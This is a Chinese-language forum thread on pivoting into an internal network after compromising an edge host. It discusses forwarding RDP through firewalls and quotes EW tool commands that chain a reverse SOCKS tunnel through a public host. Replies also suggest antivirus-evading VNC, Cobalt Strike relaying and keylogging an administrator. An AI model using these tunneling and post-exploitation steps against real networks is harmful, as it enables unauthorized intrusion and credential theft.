导航

请教关于内网转发的问题

#1
假设这样一个情景,我拿到了一个边界出网机器,然后打了一台内网不出网机器,而且有防火墙限制了,这台机器的端口,比如3389,这时候我们可以用netsh等工具将端口转发到这台出网机器?然后这台出网机器也被限制了,是否可以用端口复用来进行3389呢?
2021-09-05
#2
ew的readme,不知道是不是楼主的意思,ew这个条件的话,网络打洞即可,貌似不需要边界机器开端口??
A 主机:  目标网络的边界主机,无公网 IP,无法访问特定资源。
                B 主机:  目标网络内部主机,可访问特定资源,却无法回连公网。

                A 主机可直连 B 主机
                                      一台可控公网IP主机                    可控内网主机A         可访问指定资源的主机B
                  +---------+     +--------------------------+    |    +-----------------+      +-----------------+
                  |HackTools| ->> | 1080 ->  1.1.1.1 -> 8888 |  防火墙  | <--  2.2.2.2 --> | ->> | 9999 -> 2.2.2.3 |
                  +---------+     +--------------------------+    |    +-----------------+      +-----------------+

                a)  ./ew -s lcx_listen -l 1080 -e 8888
                            // 在 1.1.1.1 公网主机添加转接隧道,将 1080 收到的代理请求
                            // 转交给反连 8888 端口的主机
                b)  ./ew -s ssocksd -l 9999
                            // 在 2.2.2.3 主机上利用 ssocksd 方式启动 9999 端口的 socks 代理
                c)  ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
                            // 在 2.2.2.2 上,通过工具的 lcx_slave 方式,打通1.1.1.1:8888 和 2.2.2.3:9999 之间的通讯隧道
                d)  HackTools 可通过访问 1.1.1.1:1080 来使用 2.2.2.3 主机提供的 socks5 代理
2021-09-06
#3
做端口转发到一个随机端口,然后通过该端口走rdp的流量,这样的方式应该更好 吧
2021-09-06
#4
他的意思是那台外网主机也只有3389出网,想做端口复用不知道行不行得通。
2021-09-07
#5
这种情况搞那么复杂干嘛 直接上vnc啊 又不报毒,
内网不出网,直接新建一个cs用边界出网机器ip来搞,也可以用cs内网中转
再蹲一个管理员ip 键盘记录 看看能不能进到管理员的电脑,
2021-09-07
#6
还得看二楼
2021-09-08
#7
回复 1# WMZB
外网边界机器用正向http代理上线cs
2021-09-09
#8
https://github.com/L-codes/Neo-reGeorg
这个能解决你的问题。EW我记得不带正向复用的。
2021-09-09
#9
ew的readme,不知道是不是楼主的意思,ew这个条件的话,网络打洞即可,貌似不需要边界机器开端口??{:6_43 ...
Yenan 发表于 2021-9-5 20:11 [img]https://www.t00ls.com/images/common/back.gif[/img]



   
这个其实就是个端口转发功能。。并没有实现复用。楼主这个是不出网,明显用不了。
2021-09-13
#10
毒液的端口复用有限制 好像没有很好的办法